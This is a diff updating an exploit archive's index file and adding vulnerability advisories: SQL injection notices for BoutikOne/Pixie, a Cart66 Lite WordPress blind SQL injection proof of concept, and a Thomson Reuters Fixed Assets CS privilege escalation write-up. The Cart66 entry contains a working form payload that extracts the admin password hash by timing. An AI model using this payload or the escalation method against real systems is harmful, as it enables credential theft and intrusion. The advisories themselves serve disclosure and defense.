Updated 12_05_2014

files.csv

@@ -20281,7 +20281,7 @@ id,file,description,date,author,platform,type,port
 23077,platforms/linux/local/23077.pl,"MySQL (Linux) - Database Privilege Elevation Exploit (0day)",2012-12-02,kingcope,linux,local,0
 23078,platforms/linux/dos/23078.txt,"MySQL - Denial of Service PoC (0day)",2012-12-02,kingcope,linux,dos,0
 23079,platforms/windows/remote/23079.txt,"FreeFTPD - Remote Authentication Bypass Exploit (0day)",2012-12-02,kingcope,windows,remote,0
-23080,platforms/windows/remote/23080.txt,"FreeSSHD - Remote Authentication Bypass Exploit (0day)",2012-12-02,kingcope,windows,remote,0
+23080,platforms/windows/remote/23080.txt,"FreeSSHD 2.1.3 - Remote Authentication Bypass Exploit (0day)",2012-12-02,kingcope,windows,remote,0
 23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Preauth User Enumeration (0day)",2012-12-02,kingcope,multiple,remote,0
 23082,platforms/linux/remote/23082.txt,"SSH.com Communications SSH Tectia Authentication Bypass Remote Exploit (0day)",2012-12-02,kingcope,linux,remote,0
 23083,platforms/windows/remote/23083.txt,"MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day",2012-12-02,kingcope,windows,remote,0
@@ -24446,7 +24446,7 @@ id,file,description,date,author,platform,type,port
 27394,platforms/php/webapps/27394.txt,"DCP-Portal 3.7/4.x/5.x/6.x lostpassword.php Multiple Parameter XSS",2006-03-09,"Nenad Jovanovic",php,webapps,0
 27395,platforms/php/webapps/27395.txt,"DCP-Portal 3.7/4.x/5.x/6.x mycontents.php Multiple Parameter XSS",2006-03-09,"Nenad Jovanovic",php,webapps,0
 27396,platforms/php/webapps/27396.txt,"txtForum 1.0.3/1.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps,0
-27397,platforms/linux/remote/27397.txt,"Apache suEXEC Privilege Elevation / Information Disclosure",2013-08-07,kingcope,linux,remote,0
+27397,platforms/linux/remote/27397.txt,"Apache suEXEC - Privilege Elevation / Information Disclosure",2013-08-07,kingcope,linux,remote,0
 27398,platforms/php/webapps/27398.txt,"Pluck CMS 4.7 - HTML Code Injection",2013-08-07,"Yashar shahinzadeh",php,webapps,0
 27399,platforms/php/webapps/27399.txt,"Wordpress Booking Calendar 4.1.4 - CSRF Vulnerability",2013-08-07,"Dylan Irzi",php,webapps,0
 27400,platforms/windows/remote/27400.py,"HP Data Protector Arbitrary Remote Command Execution",2013-08-07,"Alessandro Di Pinto and Claudio Moletta",windows,remote,0
@@ -31909,6 +31909,7 @@ id,file,description,date,author,platform,type,port
 35420,platforms/hardware/webapps/35420.txt,"IPUX Cube Type CS303C IP Camera - (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
 35421,platforms/hardware/webapps/35421.txt,"IPUX CL5452/CL5132 IP Camera - (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
 35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
+35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0
 35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
 35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
 35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
@@ -31932,3 +31933,7 @@ id,file,description,date,author,platform,type,port
 35452,platforms/php/webapps/35452.txt,"BoutikOne list.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
 35453,platforms/php/webapps/35453.txt,"BoutikOne search.php Multiple Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
 35454,platforms/php/webapps/35454.txt,"BoutikOne rss_news.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
+35455,platforms/php/webapps/35455.txt,"BoutikOne rss_flash.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
+35456,platforms/php/webapps/35456.txt,"BoutikOne rss_promo.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
+35457,platforms/php/webapps/35457.txt,"BoutikOne rss_top10.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
+35459,platforms/php/webapps/35459.txt,"Cart66 Lite WordPress Ecommerce 1.5.1.17 - Blind SQL Injection",2014-12-03,"Kacper Szurek",php,webapps,80

platforms/php/webapps/35455.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46861/info
+    
+Pixie is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+    
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+    
+http://www.example.com/rss/rss_flash.php?lang=[sqli]

platforms/php/webapps/35456.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46861/info
+     
+Pixie is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+     
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+     
+http://www.example.com/rss/rss_promo.php?lang=[sqli]

platforms/php/webapps/35457.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46861/info
+      
+Pixie is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+      
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+      
+http://www.example.com/rss/rss_top10.php?lang=[sqli]

platforms/php/webapps/35459.txt

@@ -0,0 +1,44 @@
+# Exploit Title: Cart66 Lite WordPress Ecommerce 1.5.1.17 Blind SQL Injection
+# Date: 29-10-2014
+# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
+# Software Link: https://downloads.wordpress.org/plugin/cart66-lite.1.5.1.17.zip
+# Category: webapps
+  
+1. Description
+  
+Cart66Ajax::shortcodeProductsTable() is accessible for every registered user.
+
+$postId is not escaped correctly (only html tags are stripped).
+
+File: cart66-lite\models\Cart66Ajax.php
+public static function shortcodeProductsTable() {
+    global $wpdb;
+    $prices = array();
+    $types = array();
+    $postId = Cart66Common::postVal('id');
+    $product = new Cart66Product();
+    $products = $product->getModels("where id=$postId", "order by name");
+    $data = array();
+}
+
+http://security.szurek.pl/cart66-lite-wordpress-ecommerce-15117-blind-sql-injection.html
+  
+2. Proof of Concept
+
+Login as regular user (created using wp-login.php?action=register):
+
+<form action="http://wordpress-install/wp-admin/admin-ajax.php" method="post">
+    <input type="hidden" name="action" value="shortcode_products_table">
+    Blind SQL Injection: <input type="text" name="id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM wp_users WHERE ID = 1) -- ">
+    <input value="Hack" type="submit">
+</form>
+
+This SQL will check if first password character user ID=1 is ?$?.
+
+If yes, it will sleep 5 seconds.
+  
+3. Solution:
+  
+Update to version 1.5.2
+https://wordpress.org/plugins/cart66-lite/changelog/
+https://downloads.wordpress.org/plugin/cart66-lite.1.5.2.zip

platforms/windows/local/35423.txt

@@ -0,0 +1,151 @@
+# Exploit Title: Thomson Reuters Fixed Assets CS <=13.1.4 Local Privilege
+Escalation/Code Execution
+
+
+
+# Date: 12/1/14
+
+# Exploit Author: singularitysec@gmail.com
+
+# Vendor Homepage: https://cs.thomsonreuters.com
+
+# Version: Fixed Assets CS <=13.1.4 Local Privilege Escalation/Code
+Execution
+
+# Tested on: Windows XP -> Windows 7, Windows 8
+
+# CVE : 2014-9141
+
+
+
+Product Affected:
+
+
+Fixed Assets CS <=13.1.4 (Workstation Install)
+
+
+Note: 2003/2008 Terminal Services/Published apps **may** be vulnerable,
+depending on system configuration.
+
+
+This vulnerability has been reference checked against multiple
+
+installs. This configuration was identical across all systems and each
+
+version encountered.
+
+
+Executables/Services:
+
+
+C:\WinCSI\Tools\connectbgdl.exe
+
+
+Attack Detail:
+
+
+The Fixed Assets CS installer places a system startup item at
+C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
+
+
+Which then executes the utility at C:\WinCSI\Tools\connectbgdl.exe.
+
+
+
+
+
+
+
+
+
+
+The executables that are installed, by default, allow AUTHENTICATED USERS
+
+
+to modify, replace or alter the file.
+
+
+
+
+
+This would allow an attacker to inject their code or replace the executable
+and have it run in the context
+
+
+of an authenticated user.
+
+
+
+An attacker can use this to escalate privileges to the highest privileged
+level of user to sign on to the system. This would require them to stop the
+vulnerable executable
+
+
+or reboot the system. The executable appears to only allow on instance to
+be executed at a time by default, the attacker would need to restart or
+kill the process. These are the default settings for this process.
+
+
+
+
+
+
+This could compromise a machine on which it was
+
+
+installed, giving the process/attacker access to the machine in
+
+
+question or execute code as that user.
+
+
+
+An attacker can replace the file or append code to the
+
+
+executable, reboot the system or kill the process and it would then
+
+
+compromise the machine when a higher privileged user (administrator) logged
+in.
+
+
+
+This affects workstation builds. It may be possible on legacy
+servers/published application platforms but this was not tested.
+
+
+
+
+Remediation:
+
+
+
+Remove the modify/write permissions on the executables to allow only
+
+
+privileged users to alter the files.
+
+
+Apply vendor patch when distributed.
+
+
+
+
+Vulnerability Discovered: 11/27/2014
+
+
+Vendor Notified: 12/1/2014
+
+
+
+
+
+
+Website: www.information-paradox.net
+
+
+This vulnerability was discovered by singularitysec@gmail.com. Please
+
+
+credit the author in all references to this exploit.

platforms/windows/remote/23080.txt

@@ -2,7 +2,7 @@ FreeSSHD all version Remote Authentication Bypass ZERODAY
 Discovered & Exploited by Kingcope
 Year 2011
 
-http://www.exploit-db.com/sploits/23080.zip
+## Exploit-DB mirror: http://www.exploit-db.com/sploits/23080.zip
 
 Run like: